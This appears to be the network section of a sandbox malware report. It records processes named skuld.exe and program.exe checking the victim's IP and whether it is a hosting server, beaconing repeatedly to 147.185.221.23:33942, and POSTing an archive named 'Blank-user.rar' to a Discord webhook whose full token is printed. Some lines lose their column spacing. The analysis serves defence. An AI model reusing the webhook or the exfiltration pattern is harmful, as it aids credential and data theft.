Nov 17, 2024 11:22:21.648926973 CET  33942        49721      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:21.650665998 CET  33942        49722      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:21.650763035 CET  49722        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:21.676417112 CET  49722        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:21.681423903 CET  33942        49722      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:28.929035902 CET  49722        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:28.934247017 CET  33942        49722      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:30.132998943 CET  33942        49722      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:30.133063078 CET  49722        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:34.018906116 CET  49722        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:34.020953894 CET  49723        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:34.393838882 CET  49722        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:34.694886923 CET  33942        49722      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:34.694911957 CET  33942        49723      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:34.694941998 CET  33942        49722      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:34.695056915 CET  49723        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:34.695059061 CET  49722        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:35.002608061 CET  49723        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:35.007755041 CET  33942        49723      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:35.019568920 CET  49723        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:35.024481058 CET  33942        49723      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:35.706482887 CET  49723        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:35.711406946 CET  33942        49723      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:40.909856081 CET  49723        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:40.914947987 CET  33942        49723      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:44.175192118 CET  49723        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:44.180037022 CET  33942        49723      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:44.188129902 CET  33942        49723      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:44.189503908 CET  49723        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:45.128194094 CET  49723        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:45.129548073 CET  49724        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:45.133105040 CET  33942        49723      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:45.134533882 CET  33942        49724      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:45.135521889 CET  49724        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:45.249880075 CET  49724        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:45.254837036 CET  33942        49724      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:45.315901041 CET  49724        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:45.320919037 CET  33942        49724      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:53.623846054 CET  33942        49724      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:53.623920918 CET  49724        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:55.553608894 CET  49724        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:55.556078911 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:55.558722019 CET  33942        49724      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:55.560981035 CET  33942        49725      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:55.561043978 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:55.606442928 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:55.611387968 CET  33942        49725      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:55.644301891 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:55.649091005 CET  33942        49725      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:55.675570011 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:55.680438995 CET  33942        49725      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:55.690874100 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:55.695683002 CET  33942        49725      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:55.722362041 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:55.727241993 CET  33942        49725      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:58.034698963 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:58.118319988 CET  33942        49725      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:00.831619978 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:00.836469889 CET  33942        49725      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:04.044791937 CET  33942        49725      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:04.044845104 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:06.003180981 CET  49725        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:06.005336046 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:06.008513927 CET  33942        49725      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:06.010189056 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:06.010273933 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:06.057050943 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:06.061923981 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:06.113498926 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:06.118463993 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:11.331630945 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:11.336673021 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:11.535917997 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:11.541093111 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:11.551496983 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:11.556536913 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:11.597204924 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:11.602190018 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:11.628463984 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:11.633382082 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:13.987951040 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:13.992997885 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:14.500782967 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:14.500870943 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:16.645378113 CET  49726        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:16.646028996 CET  49727        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:16.650374889 CET  33942        49726      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:16.650926113 CET  33942        49727      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:16.651175022 CET  49727        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:16.713491917 CET  49727        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:16.718493938 CET  33942        49727      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:22.065913916 CET  49727        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:22.070782900 CET  33942        49727      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:22.191107035 CET  49727        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:22.196059942 CET  33942        49727      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:25.515655041 CET  33942        49727      147.185.221.23   192.168.2.8
Nov 17, 2024 11:23:25.515726089 CET  49727        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:27.257756948 CET  49727        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:23:27.261389971 CET  49728        33942      192.168.2.8      147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.262918949 CET3394249727147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.266392946 CET3394249728147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.269902945 CET4972833942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.399560928 CET4972833942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.405394077 CET3394249728147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.456634998 CET4972833942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.461749077 CET3394249728147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.519532919 CET4972833942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.524430990 CET3394249728147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.565996885 CET4972833942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:27.571098089 CET3394249728147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:30.253582954 CET4972833942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:30.258522034 CET3394249728147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:33.271796942 CET4972833942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:33.276659966 CET3394249728147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:34.191338062 CET4972833942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:34.196434021 CET3394249728147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:35.760586977 CET3394249728147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:35.760649920 CET4972833942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:38.036921978 CET4972833942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:38.039653063 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:38.041805029 CET3394249728147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:38.044681072 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:38.044756889 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:38.424041986 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:38.429488897 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:43.706758976 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:43.711553097 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:43.784845114 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:43.789665937 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:43.800507069 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:43.805443048 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:43.847388029 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:43.852359056 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:43.878571033 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:43.883374929 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:44.050502062 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:44.055638075 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:44.081603050 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:44.086605072 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:46.529719114 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:46.529829979 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.115725994 CET4972933942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.116141081 CET4973033942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.120652914 CET3394249729147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.121083021 CET3394249730147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.121206045 CET4973033942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.361920118 CET4973033942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.366941929 CET3394249730147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.378473997 CET4973033942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.383450985 CET3394249730147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.394304991 CET4973033942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.399243116 CET3394249730147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.472368002 CET4973033942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:49.477283001 CET3394249730147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:54.238266945 CET4973033942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:54.243535995 CET3394249730147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:57.609400988 CET3394249730147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:57.609457970 CET4973033942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.862983942 CET4973033942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.866415977 CET4973133942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.867888927 CET3394249730147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.871377945 CET3394249731147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.871583939 CET4973133942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.907238007 CET4973133942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.912126064 CET3394249731147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.925318956 CET4973133942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.930187941 CET3394249731147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.972347021 CET4973133942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.977201939 CET3394249731147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.988009930 CET4973133942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:23:59.993079901 CET3394249731147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:24:08.352550983 CET3394249731147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:24:08.352617979 CET4973133942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:24:12.429292917 CET4973133942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:25:12.916258097 CET4973233942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:25:13.925280094 CET4973233942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:25:15.925308943 CET4973233942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:25:19.925321102 CET4973233942192.168.2.8147.185.221.23
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 17, 2024 11:21:20.330359936 CET | 62344 | 53 | 192.168.2.8 | 1.1.1.1
Nov 17, 2024 11:21:20.352200031 CET | 53 | 62344 | 1.1.1.1 | 192.168.2.8
Nov 17, 2024 11:21:22.051997900 CET | 50212 | 53 | 192.168.2.8 | 1.1.1.1
Nov 17, 2024 11:21:22.058840990 CET | 53 | 50212 | 1.1.1.1 | 192.168.2.8
Nov 17, 2024 11:21:50.802855968 CET | 58569 | 53 | 192.168.2.8 | 1.1.1.1
Nov 17, 2024 11:21:50.809957027 CET | 53 | 58569 | 1.1.1.1 | 192.168.2.8
Nov 17, 2024 11:21:51.802392960 CET | 56353 | 53 | 192.168.2.8 | 1.1.1.1
Nov 17, 2024 11:21:51.809190035 CET | 53 | 56353 | 1.1.1.1 | 192.168.2.8
Nov 17, 2024 11:22:00.181283951 CET | 59798 | 53 | 192.168.2.8 | 1.1.1.1
Nov 17, 2024 11:22:00.188334942 CET | 53 | 59798 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 17, 2024 11:21:20.330359936 CET | 192.168.2.8 | 1.1.1.1 | 0x3edb | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:21:22.051997900 CET | 192.168.2.8 | 1.1.1.1 | 0x37cd | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:21:50.802855968 CET | 192.168.2.8 | 1.1.1.1 | 0x9a3d | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:21:51.802392960 CET | 192.168.2.8 | 1.1.1.1 | 0x1bd6 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:00.181283951 CET | 192.168.2.8 | 1.1.1.1 | 0xa566 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 17, 2024 11:21:20.352200031 CET | 1.1.1.1 | 192.168.2.8 | 0x3edb | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:21:20.352200031 CET | 1.1.1.1 | 192.168.2.8 | 0x3edb | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:21:20.352200031 CET | 1.1.1.1 | 192.168.2.8 | 0x3edb | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:21:22.058840990 CET | 1.1.1.1 | 192.168.2.8 | 0x37cd | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:21:50.809957027 CET | 1.1.1.1 | 192.168.2.8 | 0x9a3d | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:21:50.809957027 CET | 1.1.1.1 | 192.168.2.8 | 0x9a3d | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:21:50.809957027 CET | 1.1.1.1 | 192.168.2.8 | 0x9a3d | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:21:51.809190035 CET | 1.1.1.1 | 192.168.2.8 | 0x1bd6 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:00.188334942 CET | 1.1.1.1 | 192.168.2.8 | 0xa566 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:00.188334942 CET | 1.1.1.1 | 192.168.2.8 | 0xa566 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:00.188334942 CET | 1.1.1.1 | 192.168.2.8 | 0xa566 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:00.188334942 CET | 1.1.1.1 | 192.168.2.8 | 0xa566 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:00.188334942 CET | 1.1.1.1 | 192.168.2.8 | 0xa566 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
• api.ipify.org
• discord.com
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 208.95.112.1 | 80 | 3872 | C:\Users\user\AppData\Roaming\skuld.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 11:21:22.065615892 CET | 111 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Nov 17, 2024 11:21:22.714550018 CET | 174 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 10:21:22 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 5
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 74 72 75 65 0a
Data Ascii: true


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.8 | 49716 | 208.95.112.1 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 11:21:51.814764023 CET | 111 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Nov 17, 2024 11:21:52.427078962 CET | 174 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 10:21:51 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 5
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 74 72 75 65 0a
Data Ascii: true


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49717 | 208.95.112.1 | 80 | 2360 | C:\Users\user\AppData\Roaming\program.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 11:21:59.136667967 CET | 116 | OUT | GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.3
Nov 17, 2024 11:21:59.783755064 CET | 375 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 10:21:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 198
Access-Control-Allow-Origin: *
X-Ttl: 52
X-Rl: 43
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 72 65 76 65 72 73 65 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 22 7d
Data Ascii: {"status":"success","country":"United States","regionName":"Texas","timezone":"America/Chicago","reverse":"173.254.250.70.static.quadranet.com","mobile":false,"proxy":false,"query":"173.254.250.70"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 172.67.74.152 | 443 | 3872 | C:\Users\user\AppData\Roaming\skuld.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-17 10:21:21 UTC | 94 | OUT | GET / HTTP/1.1
Host: api.ipify.org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
2024-11-17 10:21:21 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 10:21:21 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8e3efe4eff586c57-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=2242&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=709&delivery_rate=1271290&cwnd=251&unsent_bytes=0&cid=378a7c39ead3d4b2&ts=253&x=0"
2024-11-17 10:21:21 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30
Data Ascii: 173.254.250.70


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49718 | 162.159.128.233 | 443 | 2360 | C:\Users\user\AppData\Roaming\program.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-17 10:22:00 UTC | 302 | OUT | POST /api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM HTTP/1.1
Host: discord.com
Accept-Encoding: identity
Content-Length: 502440
User-Agent: python-urllib3/2.2.3
Content-Type: multipart/form-data; boundary=6672d82bd038a7446290ef714c16a718
2024-11-17 10:22:00 UTC | 16384 | OUT | Data Raw: 2d 2d 36 36 37 32 64 38 32 62 64 30 33 38 61 37 34 34 36 32 39 30 65 66 37 31 34 63 31 36 61 37 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 68 75 62 65 72 74 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 e4 36 e6 ac 21 04 00 00 01 0f fa 7b 42 4a fc 8b ed ed bc 55 ee fb de 56 e7 c7 5c cc 1b 16 a8 3f dd 78 73 f4 bd f7 5c c5 c7 62 28 fb 3e d1 9e 6c b5 fc b9 8e 33 9f 63 cf ee 78 2c b2 bf a3 40 5d 78 da 72 91 1e 37 49 cc 5f 83 62 8b 8b be 3b d1 b1 9c bc 7c cc 21 46 93 3e 8b 92 28 f5 4c 1d
Data Ascii: --6672d82bd038a7446290ef714c16a718Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!6!{BJUV\?xs\b(>l3cx,@]xr7I_b;|!F>(L
                                                                                                                                                                                                                                Data Ascii: b8L{b VfeDy(jiQ#[F(Sb_y J6lO}L*/zTDu5J\YD<-G"/>cS|ABE8*u2Q;$f=0]pE%VVfNKU@u(gh31!pjBL^iE
